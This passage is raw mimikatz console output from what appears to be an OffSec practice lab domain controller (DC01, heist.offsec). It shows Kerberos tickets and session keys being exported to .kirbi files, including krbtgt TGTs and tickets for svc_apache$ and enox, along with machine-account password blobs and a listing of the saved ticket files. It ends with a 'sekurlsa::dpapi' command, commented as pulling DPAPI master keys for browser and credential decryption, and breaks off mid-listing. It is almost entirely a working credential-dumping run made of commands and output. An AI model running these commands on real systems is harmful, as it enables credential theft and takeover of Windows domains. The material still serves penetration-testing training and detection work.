	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;4b3fbe6]-1-0-50a50000-svc_apache$@HTTP-dc01.heist.offsec.kirbi !
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 9197975 (00000000:008c5997)
Session           : Network from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 7/7/2025 6:46:41 AM
SID               : S-1-5-18
 
	 * Username : DC01$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 
	   Service Name (02) : ldap ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (--) : @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     e3debf27461bcc5343d2c085f52370682c7fcc60141ef0d5d3ea24a929f39d6e
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;8c5997]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 2452729 (00000000:00256cf9)
Session           : Network from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 7/7/2025 6:41:40 AM
SID               : S-1-5-18
 
	 * Username : DC01$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 
	   Service Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (--) : @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     5565e77907f41fd33382950b154790263a4f77f1cfd4ad4ec225549a59e8e000
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5	[...]
	   * Saved to file [0;256cf9]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 2452458 (00000000:00256bea)
Session           : Network from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 7/7/2025 6:41:40 AM
SID               : S-1-5-18
 
	 * Username : DC01$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 
	   Service Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (--) : @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     5565e77907f41fd33382950b154790263a4f77f1cfd4ad4ec225549a59e8e000
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5	[...]
	   * Saved to file [0;256bea]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 1097746 (00000000:0010c012)
Session           : Network from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 7/7/2025 6:39:08 AM
SID               : S-1-5-18
 
	 * Username : DC01$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 6:39:08 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
	   Target Name  (--) : @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     7eaee295a9e8b9a20981c84956a448c8a8f12076fa1a5107cc8e0e97d1169975
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2	[...]
	   * Saved to file [0;10c012]-2-0-60a10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi !
 
Authentication Id : 0 ; 1019808 (00000000:000f8fa0)
Session           : Network from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 7/7/2025 6:39:05 AM
SID               : S-1-5-18
 
	 * Username : DC01$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 
	   Service Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (--) : @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     5565e77907f41fd33382950b154790263a4f77f1cfd4ad4ec225549a59e8e000
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5	[...]
	   * Saved to file [0;f8fa0]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 446257 (00000000:0006cf31)
Session           : Service from 0
User Name         : enox
Domain            : HEIST
Logon Server      : DC01
Logon Time        : 8/1/2024 7:28:11 PM
SID               : S-1-5-21-537427935-490066102-1511301751-1103
 
	 * Username : enox
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
	 [00000000]
	   Start/End/MaxRenew: 8/1/2024 7:28:11 PM ; 8/2/2024 5:28:11 AM ; 8/8/2024 7:28:11 PM
	   Service Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
	   Target Name  (02) : krbtgt ; HEIST ; @ HEIST.OFFSEC
	   Client Name  (01) : enox ; @ HEIST.OFFSEC ( HEIST )
	   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     be727dd8334980e24601b6688970f38d322994f448ab5ac841c247516458c07a
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2	[...]
	   * Saved to file [0;6cf31]-2-0-40e10000-enox@krbtgt-HEIST.OFFSEC.kirbi !
 
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-19
 
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 69663 (00000000:0001101f)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-90-0-1
 
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9 
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 42584 (00000000:0000a658)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-0
 
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64 
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 42510 (00000000:0000a60e)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-1
 
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9 
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 42419 (00000000:0000a5b3)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-0
 
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9 
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:30 PM
SID               : S-1-5-18
 
	 * Username : dc01$
	 * Domain   : HEIST.OFFSEC
	 * Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9 
 
	Group 0 - Ticket Granting Service
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 8:55:20 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : HOST ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (02) : HOST ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     94160d0c3c0460ff6cc3ba28f680b2378943450a92260fc0cbd7397280e97f21
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;3e7]-0-0-40a50000-DC01$@HOST-DC01.heist.offsec.kirbi !
	 [00000001]
	   Start/End/MaxRenew: 7/7/2025 6:51:36 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : GC ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (02) : GC ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC ( heist.offsec )
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     0b0d9c36e92a3ec3af5d54819d426b8bf9f5c87c78310b0539708d7440343ce7
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;3e7]-0-1-40a50000-DC01$@GC-DC01.heist.offsec.kirbi !
	 [00000002]
	   Start/End/MaxRenew: 7/7/2025 6:46:24 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : cifs ; DC01 ; @ HEIST.OFFSEC
	   Target Name  (02) : cifs ; DC01 ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     fdcef0a46e0716bcd5a884128cb7ada815223da0686b31dd70a9b234e272927b
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;3e7]-0-2-40a50000-DC01$@cifs-DC01.kirbi !
	 [00000003]
	   Start/End/MaxRenew: 7/7/2025 6:44:13 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : LDAP ; DC01 ; @ HEIST.OFFSEC
	   Target Name  (02) : LDAP ; DC01 ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     2f6317f1f362e0f6143ca26f202b7dd4512f992d0beb363dff8dae9c54578b44
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;3e7]-0-3-40a50000-DC01$@LDAP-DC01.kirbi !
	 [00000004]
	   Start/End/MaxRenew: 7/7/2025 6:42:39 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : cifs ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (02) : cifs ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC ( heist.offsec )
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     04cee63b2830f4189168d372efc46092fee0371013586a76fdd421284605d00c
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;3e7]-0-4-40a50000-DC01$@cifs-DC01.heist.offsec.kirbi !
	 [00000005]
	   Start/End/MaxRenew: 7/7/2025 6:42:39 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (01) : DC01$ ; @ HEIST.OFFSEC
	   Target Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     95e3fb9ae9e124c6c66aa675f19f602b6be1796fe7fb9d1f13ca3a31f46264ca
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;3e7]-0-5-40a50000.kirbi !
	 [00000006]
	   Start/End/MaxRenew: 7/7/2025 6:41:09 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : HTTP ; DC01.heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (02) : HTTP ; DC01.heist.offsec ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     3a1d4fcc432594be1a126293551294194bc94eda208f888c3d1f0f61feabc5d8
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;3e7]-0-6-40a50000-DC01$@HTTP-DC01.heist.offsec.kirbi !
	 [00000007]
	   Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : ldap ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (02) : ldap ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC ( HEIST.OFFSEC )
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     e3debf27461bcc5343d2c085f52370682c7fcc60141ef0d5d3ea24a929f39d6e
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;3e7]-0-7-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
	 [00000008]
	   Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     5565e77907f41fd33382950b154790263a4f77f1cfd4ad4ec225549a59e8e000
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5	[...]
	   * Saved to file [0;3e7]-0-8-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 6:39:08 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
	   Target Name  (--) : @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC ( $$Delegation Ticket$$ )
	   Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     7eaee295a9e8b9a20981c84956a448c8a8f12076fa1a5107cc8e0e97d1169975
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2	[...]
	   * Saved to file [0;3e7]-2-0-60a10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi !
	 [00000001]
	   Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
	   Service Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
	   Target Name  (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC ( HEIST.OFFSEC )
	   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     aff6a42e69378ba48f0474ea2120f155ad4e5e8d3d3fbabe46c7911ca338d9b0
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2	[...]
	   * Saved to file [0;3e7]-2-1-40e10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi !
 
mimikatz(commandline) # exit
Bye!
 
 
    Directory: C:\tmp
 
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----         7/7/2025  10:56 AM           1459 [0;10c012]-2-0-60a10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi               
-a----         7/7/2025  10:56 AM           1667 [0;11cb9b5]-1-0-40a50000-DC01$@GC-DC01.heist.offsec.kirbi             
-a----         7/7/2025  10:56 AM           1643 [0;256bea]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi            
-a----         7/7/2025  10:56 AM           1643 [0;256cf9]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi            
-a----         7/7/2025  10:56 AM           1643 [0;25794f]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi            
-a----         7/7/2025  10:56 AM           1671 [0;3e4]-0-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi               
-a----         7/7/2025  10:56 AM           1459 [0;3e4]-2-0-40e10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi                  
-a----         7/7/2025  10:57 AM           1671 [0;3e7]-0-0-40a50000-DC01$@HOST-DC01.heist.offsec.kirbi               
-a----         7/7/2025  10:57 AM           1667 [0;3e7]-0-1-40a50000-DC01$@GC-DC01.heist.offsec.kirbi                 
-a----         7/7/2025  10:57 AM           1617 [0;3e7]-0-2-40a50000-DC01$@cifs-DC01.kirbi                            
-a----         7/7/2025  10:57 AM           1617 [0;3e7]-0-3-40a50000-DC01$@LDAP-DC01.kirbi                            
-a----         7/7/2025  10:57 AM           1671 [0;3e7]-0-4-40a50000-DC01$@cifs-DC01.heist.offsec.kirbi               
-a----         7/7/2025  10:57 AM           1607 [0;3e7]-0-5-40a50000.kirbi                                            
-a----         7/7/2025  10:57 AM           1643 [0;3e7]-0-6-40a50000-DC01$@HTTP-DC01.heist.offsec.kirbi               
-a----         7/7/2025  10:57 AM           1671 [0;3e7]-0-7-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi               
-a----         7/7/2025  10:57 AM           1643 [0;3e7]-0-8-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi               
-a----         7/7/2025  10:57 AM           1459 [0;3e7]-2-0-60a10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi                  
-a----         7/7/2025  10:57 AM           1459 [0;3e7]-2-1-40e10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi                  
-a----         7/7/2025  10:56 AM           1517 [0;4b3fbe6]-1-0-50a50000-svc_apache$@HTTP-dc01.heist.offsec.kirbi     
-a----         7/7/2025  10:56 AM           1517 [0;4b6c5a8]-1-0-50a50000-svc_apache$@HTTP-dc01.heist.offsec.kirbi     
-a----         7/7/2025  10:56 AM           1441 [0;6cf31]-2-0-40e10000-enox@krbtgt-HEIST.OFFSEC.kirbi                 
-a----         7/7/2025  10:56 AM           1671 [0;8c5997]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi            
-a----         7/7/2025  10:56 AM           1643 [0;f8fa0]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi             

sekurlsa::dpapi


PS C:\tmp> .\mimikatz.exe "privilege::debug" "sekurlsa::dpapi" "exit"    # DPAPI master keys (browser/credential decryption)
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # sekurlsa::dpapi
 
Authentication Id : 0 ; 69682 (00000000:00011032)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-90-0-1
 
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-20
 
 
Authentication Id : 0 ; 42579 (00000000:0000a653)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-1
 
 
Authentication Id : 0 ; 39710 (00000000:00009b1e)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:30 PM
SID               : 
 
 
Authentication Id : 0 ; 446257 (00000000:0006cf31)
Session           : Service from 0
User Name         : enox
Domain            : HEIST
Logon Server      : DC01
Logon Time        : 8/1/2024 7:28:11 PM
SID               : S-1-5-21-537427935-490066102-1511301751-1103
 
 
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-19
 
 
Authentication Id : 0 ; 69663 (00000000:0001101f)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-90-0-1
 
 
Authentication Id : 0 ; 42584 (00000000:0000a658)
Session           : Interactive from 0
